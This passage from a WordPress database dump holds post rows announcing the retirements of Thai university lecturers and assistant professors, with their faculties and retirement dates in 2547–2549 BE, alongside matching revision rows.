(245, 1, '2019-05-26 15:06:55', '2019-05-26 08:06:55', 'ผู้ช่วยศาสตราจารย์รำไพทิพย์  ธีรนิติ\r\n\r\nสังกัด  คณะครุศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 1 ตุลาคม 2547', 'ผู้ช่วยศาสตราจารย์รำไพทิพย์  ธีรนิติ', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%a3%e0%b8%b3%e0%b9%84%e0%b8%9e', '', '', '2019-05-26 15:06:55', '2019-05-26 08:06:55', '', 0, 'http://172.17.40.11/wp511/?p=245', 0, 'post', '', 0),
(246, 1, '2019-05-26 15:06:55', '2019-05-26 08:06:55', 'ผู้ช่วยศาสตราจารย์รำไพทิพย์  ธีรนิติ\r\n\r\nสังกัด  คณะครุศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 1 ตุลาคม 2547', 'ผู้ช่วยศาสตราจารย์รำไพทิพย์  ธีรนิติ', '', 'inherit', 'closed', 'closed', '', '245-revision-v1', '', '', '2019-05-26 15:06:55', '2019-05-26 08:06:55', '', 245, 'http://172.17.40.11/wp511/?p=246', 0, 'revision', '', 0),
(247, 1, '2019-05-26 15:07:11', '2019-05-26 08:07:11', 'ผู้ช่วยศาสตราจารย์ศรีสมร ศรีเบญจพลางกูร\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 1 ตุลาคม 2547', 'ผู้ช่วยศาสตราจารย์ศรีสมร ศรีเบญจพลางกูร', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%a8%e0%b8%a3%e0%b8%b5%e0%b8%aa', '', '', '2019-05-26 15:07:11', '2019-05-26 08:07:11', '', 0, 'http://172.17.40.11/wp511/?p=247', 0, 'post', '', 0),
(248, 1, '2019-05-26 15:07:11', '2019-05-26 08:07:11', 'ผู้ช่วยศาสตราจารย์ศรีสมร ศรีเบญจพลางกูร\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 1 ตุลาคม 2547', 'ผู้ช่วยศาสตราจารย์ศรีสมร ศรีเบญจพลางกูร', '', 'inherit', 'closed', 'closed', '', '247-revision-v1', '', '', '2019-05-26 15:07:11', '2019-05-26 08:07:11', '', 247, 'http://172.17.40.11/wp511/?p=248', 0, 'revision', '', 0),
(249, 1, '2019-05-26 15:07:23', '2019-05-26 08:07:23', 'ผู้ช่วยศาสตราจารย์แสน  วัตรุจีกฤต\r\n\r\nสังกัด  คณะวิทยาศาสตร์และเทคโนโลยี\r\n\r\nเกษียณอายุราชการ  วันที่ 1 ตุลาคม 2547', 'ผู้ช่วยศาสตราจารย์แสน  วัตรุจีกฤต', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b9%81%e0%b8%aa%e0%b8%99', '', '', '2019-05-26 15:07:23', '2019-05-26 08:07:23', '', 0, 'http://172.17.40.11/wp511/?p=249', 0, 'post', '', 0),
(250, 1, '2019-05-26 15:07:23', '2019-05-26 08:07:23', 'ผู้ช่วยศาสตราจารย์แสน  วัตรุจีกฤต\r\n\r\nสังกัด  คณะวิทยาศาสตร์และเทคโนโลยี\r\n\r\nเกษียณอายุราชการ  วันที่ 1 ตุลาคม 2547', 'ผู้ช่วยศาสตราจารย์แสน  วัตรุจีกฤต', '', 'inherit', 'closed', 'closed', '', '249-revision-v1', '', '', '2019-05-26 15:07:23', '2019-05-26 08:07:23', '', 249, 'http://172.17.40.11/wp511/?p=250', 0, 'revision', '', 0),
(251, 1, '2019-05-26 15:07:38', '2019-05-26 08:07:38', 'อาจารย์โชคชัย  พร้อมมูล\r\n\r\nสังกัด  คณะครุศาสตร์\r\n\r\nเข้าร่วมโครงการเปลี่ยนเส้นทางชีวิต  เกษียณอายุราชการ  วันที่ 1 ตุลาคม 2547', 'อาจารย์โชคชัย  พร้อมมูล', '', 'publish', 'closed', 'open', '', '%e0%b8%ad%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b9%82%e0%b8%8a%e0%b8%84%e0%b8%8a%e0%b8%b1%e0%b8%a2-%e0%b8%9e%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%a1%e0%b8%b9%e0%b8%a5', '', '', '2019-05-26 15:07:38', '2019-05-26 08:07:38', '', 0, 'http://172.17.40.11/wp511/?p=251', 0, 'post', '', 0),
(252, 1, '2019-05-26 15:07:38', '2019-05-26 08:07:38', 'อาจารย์โชคชัย  พร้อมมูล\r\n\r\nสังกัด  คณะครุศาสตร์\r\n\r\nเข้าร่วมโครงการเปลี่ยนเส้นทางชีวิต  เกษียณอายุราชการ  วันที่ 1 ตุลาคม 2547', 'อาจารย์โชคชัย  พร้อมมูล', '', 'inherit', 'closed', 'closed', '', '251-revision-v1', '', '', '2019-05-26 15:07:38', '2019-05-26 08:07:38', '', 251, 'http://172.17.40.11/wp511/?p=252', 0, 'revision', '', 0),
(253, 1, '2019-05-26 15:07:53', '2019-05-26 08:07:53', 'อาจารย์นันทวรรณ  โบรเดอร์\r\n\r\nเกษียณอายุราชการ  วันที่ 1 ตุลาคม 2547', 'อาจารย์นันทวรรณ  โบรเดอร์', '', 'publish', 'closed', 'open', '', '%e0%b8%ad%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%99%e0%b8%b1%e0%b8%99%e0%b8%97%e0%b8%a7%e0%b8%a3%e0%b8%a3%e0%b8%93-%e0%b9%82%e0%b8%9a%e0%b8%a3%e0%b9%80%e0%b8%94%e0%b8%ad', '', '', '2019-05-26 15:07:53', '2019-05-26 08:07:53', '', 0, 'http://172.17.40.11/wp511/?p=253', 0, 'post', '', 0),
(254, 1, '2019-05-26 15:07:53', '2019-05-26 08:07:53', 'อาจารย์นันทวรรณ  โบรเดอร์\r\n\r\nเกษียณอายุราชการ  วันที่ 1 ตุลาคม 2547', 'อาจารย์นันทวรรณ  โบรเดอร์', '', 'inherit', 'closed', 'closed', '', '253-revision-v1', '', '', '2019-05-26 15:07:53', '2019-05-26 08:07:53', '', 253, 'http://172.17.40.11/wp511/?p=254', 0, 'revision', '', 0),
(255, 1, '2019-05-26 15:08:06', '2019-05-26 08:08:06', 'ผู้ช่วยศาสตราจารย์บุญยืน  จุลทอง\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเข้าร่วมโครงการเปลี่ยนเส้นทางชีวิต  เกษียณอายุราชการ  วันที่ 1 ตุลาคม 2547', 'ผู้ช่วยศาสตราจารย์บุญยืน  จุลทอง', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%9a%e0%b8%b8%e0%b8%8d%e0%b8%a2', '', '', '2019-05-26 15:08:06', '2019-05-26 08:08:06', '', 0, 'http://172.17.40.11/wp511/?p=255', 0, 'post', '', 0),
(256, 1, '2019-05-26 15:08:06', '2019-05-26 08:08:06', 'ผู้ช่วยศาสตราจารย์บุญยืน  จุลทอง\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเข้าร่วมโครงการเปลี่ยนเส้นทางชีวิต  เกษียณอายุราชการ  วันที่ 1 ตุลาคม 2547', 'ผู้ช่วยศาสตราจารย์บุญยืน  จุลทอง', '', 'inherit', 'closed', 'closed', '', '255-revision-v1', '', '', '2019-05-26 15:08:06', '2019-05-26 08:08:06', '', 255, 'http://172.17.40.11/wp511/?p=256', 0, 'revision', '', 0),
(257, 1, '2019-05-26 15:08:22', '2019-05-26 08:08:22', 'ผู้ช่วยศาสตราจารย์พวงน้อย  สุวรรณเจริญ\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเข้าร่วมโครงการเปลี่ยนเส้นทางชีวิต  เกษียณอายุราชการ  วันที่ 1 ตุลาคม 2547', 'ผู้ช่วยศาสตราจารย์พวงน้อย  สุวรรณเจริญ', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%9e%e0%b8%a7%e0%b8%87%e0%b8%99', '', '', '2019-05-26 15:08:22', '2019-05-26 08:08:22', '', 0, 'http://172.17.40.11/wp511/?p=257', 0, 'post', '', 0),
(258, 1, '2019-05-26 15:08:22', '2019-05-26 08:08:22', 'ผู้ช่วยศาสตราจารย์พวงน้อย  สุวรรณเจริญ\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเข้าร่วมโครงการเปลี่ยนเส้นทางชีวิต  เกษียณอายุราชการ  วันที่ 1 ตุลาคม 2547', 'ผู้ช่วยศาสตราจารย์พวงน้อย  สุวรรณเจริญ', '', 'inherit', 'closed', 'closed', '', '257-revision-v1', '', '', '2019-05-26 15:08:22', '2019-05-26 08:08:22', '', 257, 'http://172.17.40.11/wp511/?p=258', 0, 'revision', '', 0),
(259, 1, '2019-05-26 15:08:35', '2019-05-26 08:08:35', 'อาจารย์ศันทนีย์  สังข์เกษม\r\n\r\nสังกัด  คณะเทคโนโลยีการเกษตร\r\n\r\nเข้าร่วมโครงการเปลี่ยนเส้นทางชีวิต  เกษียณอายุราชการ  วันที่ 1 ตุลาคม 2547', 'อาจารย์ศันทนีย์  สังข์เกษม', '', 'publish', 'closed', 'open', '', '%e0%b8%ad%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%a8%e0%b8%b1%e0%b8%99%e0%b8%97%e0%b8%99%e0%b8%b5%e0%b8%a2%e0%b9%8c-%e0%b8%aa%e0%b8%b1%e0%b8%87%e0%b8%82%e0%b9%8c%e0%b9%80', '', '', '2019-05-26 15:08:35', '2019-05-26 08:08:35', '', 0, 'http://172.17.40.11/wp511/?p=259', 0, 'post', '', 0),
(260, 1, '2019-05-26 15:08:35', '2019-05-26 08:08:35', 'อาจารย์ศันทนีย์  สังข์เกษม\r\n\r\nสังกัด  คณะเทคโนโลยีการเกษตร\r\n\r\nเข้าร่วมโครงการเปลี่ยนเส้นทางชีวิต  เกษียณอายุราชการ  วันที่ 1 ตุลาคม 2547', 'อาจารย์ศันทนีย์  สังข์เกษม', '', 'inherit', 'closed', 'closed', '', '259-revision-v1', '', '', '2019-05-26 15:08:35', '2019-05-26 08:08:35', '', 259, 'http://172.17.40.11/wp511/?p=260', 0, 'revision', '', 0),
(261, 1, '2019-05-26 15:08:48', '2019-05-26 08:08:48', 'ผู้ช่วยศาสตราจารย์สุนิตย์  แป้นนาบอน\r\n\r\nเข้าร่วมโครงการเปลี่ยนเส้นทางชีวิต  เกษียณอายุราชการ  วันที่ 1 ตุลาคม 2547', 'ผู้ช่วยศาสตราจารย์สุนิตย์  แป้นนาบอน', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%b4', '', '', '2019-05-26 15:08:48', '2019-05-26 08:08:48', '', 0, 'http://172.17.40.11/wp511/?p=261', 0, 'post', '', 0),
(262, 1, '2019-05-26 15:08:48', '2019-05-26 08:08:48', 'ผู้ช่วยศาสตราจารย์สุนิตย์  แป้นนาบอน\r\n\r\nเข้าร่วมโครงการเปลี่ยนเส้นทางชีวิต  เกษียณอายุราชการ  วันที่ 1 ตุลาคม 2547', 'ผู้ช่วยศาสตราจารย์สุนิตย์  แป้นนาบอน', '', 'inherit', 'closed', 'closed', '', '261-revision-v1', '', '', '2019-05-26 15:08:48', '2019-05-26 08:08:48', '', 261, 'http://172.17.40.11/wp511/?p=262', 0, 'revision', '', 0),
(263, 1, '2019-05-26 15:09:00', '2019-05-26 08:09:00', 'อาจารย์สุพร  จุลทอง\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเข้าน่วมโครงการเปลี่ยนเส้นทางชีวิต  เกษียณอายุราชการ  วันที่ 1 ตุลาคม 2547', 'อาจารย์สุพร  จุลทอง', '', 'publish', 'closed', 'open', '', '%e0%b8%ad%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%aa%e0%b8%b8%e0%b8%9e%e0%b8%a3-%e0%b8%88%e0%b8%b8%e0%b8%a5%e0%b8%97%e0%b8%ad%e0%b8%87', '', '', '2019-05-26 15:09:00', '2019-05-26 08:09:00', '', 0, 'http://172.17.40.11/wp511/?p=263', 0, 'post', '', 0),
(264, 1, '2019-05-26 15:09:00', '2019-05-26 08:09:00', 'อาจารย์สุพร  จุลทอง\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเข้าน่วมโครงการเปลี่ยนเส้นทางชีวิต  เกษียณอายุราชการ  วันที่ 1 ตุลาคม 2547', 'อาจารย์สุพร  จุลทอง', '', 'inherit', 'closed', 'closed', '', '263-revision-v1', '', '', '2019-05-26 15:09:00', '2019-05-26 08:09:00', '', 263, 'http://172.17.40.11/wp511/?p=264', 0, 'revision', '', 0),
(265, 1, '2019-05-26 15:09:11', '2019-05-26 08:09:11', 'อาจารย์องอาจ  ศรียะพันธ์\r\n\r\nเข้าร่วมโครงการเปลี่ยนเส้นทางชีวิต  เกาียณอายุราชการ  วันที่ 1 ตุลาคม 2547', 'อาจารย์องอาจ  ศรียะพันธ์', '', 'publish', 'closed', 'open', '', '%e0%b8%ad%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%ad%e0%b8%87%e0%b8%ad%e0%b8%b2%e0%b8%88-%e0%b8%a8%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%b0%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98', '', '', '2019-05-26 15:09:11', '2019-05-26 08:09:11', '', 0, 'http://172.17.40.11/wp511/?p=265', 0, 'post', '', 0),
(266, 1, '2019-05-26 15:09:11', '2019-05-26 08:09:11', 'อาจารย์องอาจ  ศรียะพันธ์\r\n\r\nเข้าร่วมโครงการเปลี่ยนเส้นทางชีวิต  เกาียณอายุราชการ  วันที่ 1 ตุลาคม 2547', 'อาจารย์องอาจ  ศรียะพันธ์', '', 'inherit', 'closed', 'closed', '', '265-revision-v1', '', '', '2019-05-26 15:09:11', '2019-05-26 08:09:11', '', 265, 'http://172.17.40.11/wp511/?p=266', 0, 'revision', '', 0),
(267, 1, '2019-05-26 15:09:26', '2019-05-26 08:09:26', 'อาจารย์อรชร  เมฆาอภิรักษ์\r\n\r\nเข้าร่วมโครงการเปลี่ยนเส้นทางชีวิต  เกษียณอายุราชการ  วันที่ 1 ตุลาคม 2547', 'อาจารย์อรชร  เมฆาอภิรักษ์', '', 'publish', 'closed', 'open', '', '%e0%b8%ad%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%ad%e0%b8%a3%e0%b8%8a%e0%b8%a3-%e0%b9%80%e0%b8%a1%e0%b8%86%e0%b8%b2%e0%b8%ad%e0%b8%a0%e0%b8%b4%e0%b8%a3%e0%b8%b1%e0%b8%81', '', '', '2019-05-26 15:09:26', '2019-05-26 08:09:26', '', 0, 'http://172.17.40.11/wp511/?p=267', 0, 'post', '', 0),
(268, 1, '2019-05-26 15:09:26', '2019-05-26 08:09:26', 'อาจารย์อรชร  เมฆาอภิรักษ์\r\n\r\nเข้าร่วมโครงการเปลี่ยนเส้นทางชีวิต  เกษียณอายุราชการ  วันที่ 1 ตุลาคม 2547', 'อาจารย์อรชร  เมฆาอภิรักษ์', '', 'inherit', 'closed', 'closed', '', '267-revision-v1', '', '', '2019-05-26 15:09:26', '2019-05-26 08:09:26', '', 267, 'http://172.17.40.11/wp511/?p=268', 0, 'revision', '', 0),
(269, 1, '2019-05-26 15:09:33', '0000-00-00 00:00:00', '', 'Auto Draft', '', 'auto-draft', 'closed', 'open', '', '', '', '', '2019-05-26 15:09:33', '0000-00-00 00:00:00', '', 0, 'http://172.17.40.11/wp511/?p=269', 0, 'post', '', 0),
(270, 1, '2019-05-26 15:09:45', '2019-05-26 08:09:45', 'อาจารย์ครรภพัชร  ว่องอนุกูล\r\n\r\nสังกัด  คณะวิทยาศาสตร์และเทคโนโลยี\r\n\r\nเกษียณอายุราชการ  วันที่ 1 ตุลาคม 2548', 'อาจารย์ครรภพัชร  ว่องอนุกูล', '', 'publish', 'closed', 'open', '', '%e0%b8%ad%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%84%e0%b8%a3%e0%b8%a3%e0%b8%a0%e0%b8%9e%e0%b8%b1%e0%b8%8a%e0%b8%a3-%e0%b8%a7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%ad%e0%b8%99', '', '', '2019-05-26 15:09:45', '2019-05-26 08:09:45', '', 0, 'http://172.17.40.11/wp511/?p=270', 0, 'post', '', 0),
(271, 1, '2019-05-26 15:09:45', '2019-05-26 08:09:45', 'อาจารย์ครรภพัชร  ว่องอนุกูล\r\n\r\nสังกัด  คณะวิทยาศาสตร์และเทคโนโลยี\r\n\r\nเกษียณอายุราชการ  วันที่ 1 ตุลาคม 2548', 'อาจารย์ครรภพัชร  ว่องอนุกูล', '', 'inherit', 'closed', 'closed', '', '270-revision-v1', '', '', '2019-05-26 15:09:45', '2019-05-26 08:09:45', '', 270, 'http://172.17.40.11/wp511/?p=271', 0, 'revision', '', 0),
(272, 1, '2019-05-26 15:10:53', '2019-05-26 08:10:53', 'อาจารย์เติมทิพย์  ทองพุก\r\n\r\nสังกัด  คณะครุศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 1 ตุลาคม 2548', 'อาจารย์เติมทิพย์  ทองพุก', '', 'publish', 'closed', 'open', '', '%e0%b8%ad%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b9%80%e0%b8%95%e0%b8%b4%e0%b8%a1%e0%b8%97%e0%b8%b4%e0%b8%9e%e0%b8%a2%e0%b9%8c-%e0%b8%97%e0%b8%ad%e0%b8%87%e0%b8%9e%e0%b8%b8', '', '', '2019-05-26 15:10:53', '2019-05-26 08:10:53', '', 0, 'http://172.17.40.11/wp511/?p=272', 0, 'post', '', 0),
(273, 1, '2019-05-26 15:10:53', '2019-05-26 08:10:53', 'อาจารย์เติมทิพย์  ทองพุก\r\n\r\nสังกัด  คณะครุศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 1 ตุลาคม 2548', 'อาจารย์เติมทิพย์  ทองพุก', '', 'inherit', 'closed', 'closed', '', '272-revision-v1', '', '', '2019-05-26 15:10:53', '2019-05-26 08:10:53', '', 272, 'http://172.17.40.11/wp511/?p=273', 0, 'revision', '', 0),
(274, 1, '2019-05-26 15:11:05', '2019-05-26 08:11:05', 'ผู้ช่วยศาสตราจารย์ถาวร  ชนะสิทธิ์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2548', 'ผู้ช่วยศาสตราจารย์ถาวร  ชนะสิทธิ์', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%96%e0%b8%b2%e0%b8%a7%e0%b8%a3', '', '', '2019-05-26 15:11:05', '2019-05-26 08:11:05', '', 0, 'http://172.17.40.11/wp511/?p=274', 0, 'post', '', 0),
(275, 1, '2019-05-26 15:11:05', '2019-05-26 08:11:05', 'ผู้ช่วยศาสตราจารย์ถาวร  ชนะสิทธิ์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2548', 'ผู้ช่วยศาสตราจารย์ถาวร  ชนะสิทธิ์', '', 'inherit', 'closed', 'closed', '', '274-revision-v1', '', '', '2019-05-26 15:11:05', '2019-05-26 08:11:05', '', 274, 'http://172.17.40.11/wp511/?p=275', 0, 'revision', '', 0),
(276, 1, '2019-05-26 15:11:18', '2019-05-26 08:11:18', 'ผู้ช่วยศาสตราจารย์ไพบูลย์  ตรีน้อยวา\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2548', 'ผู้ช่วยศาสตราจารย์ไพบูลย์  ตรีน้อยวา', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b9%84%e0%b8%9e%e0%b8%9a%e0%b8%b9', '', '', '2019-05-26 15:11:18', '2019-05-26 08:11:18', '', 0, 'http://172.17.40.11/wp511/?p=276', 0, 'post', '', 0),
(277, 1, '2019-05-26 15:11:18', '2019-05-26 08:11:18', 'ผู้ช่วยศาสตราจารย์ไพบูลย์  ตรีน้อยวา\r\n\r\nสังกัด  คณะมนุษยศาสตร์และสังคมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2548', 'ผู้ช่วยศาสตราจารย์ไพบูลย์  ตรีน้อยวา', '', 'inherit', 'closed', 'closed', '', '276-revision-v1', '', '', '2019-05-26 15:11:18', '2019-05-26 08:11:18', '', 276, 'http://172.17.40.11/wp511/?p=277', 0, 'revision', '', 0),
(278, 1, '2019-05-26 15:11:31', '2019-05-26 08:11:31', 'ผู้ช่วยศาสตราจารย์สายชล  มีทรัพย์\r\n\r\nสังกัด  คณะครุศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2548', 'ผู้ช่วยศาสตราจารย์สายชล  มีทรัพย์', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%aa%e0%b8%b2%e0%b8%a2%e0%b8%8a', '', '', '2019-05-26 15:11:31', '2019-05-26 08:11:31', '', 0, 'http://172.17.40.11/wp511/?p=278', 0, 'post', '', 0),
(279, 1, '2019-05-26 15:11:31', '2019-05-26 08:11:31', 'ผู้ช่วยศาสตราจารย์สายชล  มีทรัพย์\r\n\r\nสังกัด  คณะครุศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2548', 'ผู้ช่วยศาสตราจารย์สายชล  มีทรัพย์', '', 'inherit', 'closed', 'closed', '', '278-revision-v1', '', '', '2019-05-26 15:11:31', '2019-05-26 08:11:31', '', 278, 'http://172.17.40.11/wp511/?p=279', 0, 'revision', '', 0),
(280, 1, '2019-05-26 15:11:43', '2019-05-26 08:11:43', 'ผู้ช่วยศาสตราจารย์สุริยงค์  อัยรักษ์\r\n\r\nสังกัด  คณะศิลปกรรมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่  30  กันยายน  2548', 'ผู้ช่วยศาสตราจารย์สุริยงค์  อัยรักษ์', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%aa%e0%b8%b8%e0%b8%a3%e0%b8%b4', '', '', '2019-05-26 15:11:43', '2019-05-26 08:11:43', '', 0, 'http://172.17.40.11/wp511/?p=280', 0, 'post', '', 0),
(281, 1, '2019-05-26 15:11:43', '2019-05-26 08:11:43', 'ผู้ช่วยศาสตราจารย์สุริยงค์  อัยรักษ์\r\n\r\nสังกัด  คณะศิลปกรรมศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่  30  กันยายน  2548', 'ผู้ช่วยศาสตราจารย์สุริยงค์  อัยรักษ์', '', 'inherit', 'closed', 'closed', '', '280-revision-v1', '', '', '2019-05-26 15:11:43', '2019-05-26 08:11:43', '', 280, 'http://172.17.40.11/wp511/?p=281', 0, 'revision', '', 0),
(282, 1, '2019-05-26 15:11:57', '2019-05-26 08:11:57', 'ผู้ช่วยศาสตราจารย์อรณี  ศิริรัตนากร\r\n\r\nเกษียณอายุราชการ  วันที่  30  กันยายน  2548', 'ผู้ช่วยศาสตราจารย์อรณี  ศิริรัตนากร', '', 'publish', 'closed', 'open', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b9%88%e0%b8%a7%e0%b8%a2%e0%b8%a8%e0%b8%b2%e0%b8%aa%e0%b8%95%e0%b8%a3%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%ad%e0%b8%a3%e0%b8%93%e0%b8%b5', '', '', '2019-05-26 15:11:57', '2019-05-26 08:11:57', '', 0, 'http://172.17.40.11/wp511/?p=282', 0, 'post', '', 0),
(283, 1, '2019-05-26 15:11:57', '2019-05-26 08:11:57', 'ผู้ช่วยศาสตราจารย์อรณี  ศิริรัตนากร\r\n\r\nเกษียณอายุราชการ  วันที่  30  กันยายน  2548', 'ผู้ช่วยศาสตราจารย์อรณี  ศิริรัตนากร', '', 'inherit', 'closed', 'closed', '', '282-revision-v1', '', '', '2019-05-26 15:11:57', '2019-05-26 08:11:57', '', 282, 'http://172.17.40.11/wp511/?p=283', 0, 'revision', '', 0),
(284, 1, '2019-05-26 15:12:12', '2019-05-26 08:12:12', 'อาจารย์จิตรนาถ  แสงมุกดา\r\n\r\nสังกัด  คณะครุศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2549', 'อาจารย์จิตรนาถ  แสงมุกดา', '', 'publish', 'closed', 'open', '', '%e0%b8%ad%e0%b8%b2%e0%b8%88%e0%b8%b2%e0%b8%a3%e0%b8%a2%e0%b9%8c%e0%b8%88%e0%b8%b4%e0%b8%95%e0%b8%a3%e0%b8%99%e0%b8%b2%e0%b8%96-%e0%b9%81%e0%b8%aa%e0%b8%87%e0%b8%a1%e0%b8%b8%e0%b8%81%e0%b8%94', '', '', '2019-05-26 15:12:12', '2019-05-26 08:12:12', '', 0, 'http://172.17.40.11/wp511/?p=284', 0, 'post', '', 0),
(285, 1, '2019-05-26 15:12:12', '2019-05-26 08:12:12', 'อาจารย์จิตรนาถ  แสงมุกดา\r\n\r\nสังกัด  คณะครุศาสตร์\r\n\r\nเกษียณอายุราชการ  วันที่ 30 กันยายน 2549', 'อาจารย์จิตรนาถ  แสงมุกดา', '', 'inherit', 'closed', 'closed', '', '284-revision-v1', '', '', '2019-05-26 15:12:12', '2019-05-26 08:12:12', '', 284, 'http://172.17.40.11/wp511/?p=285', 0, 'revision', '', 0),
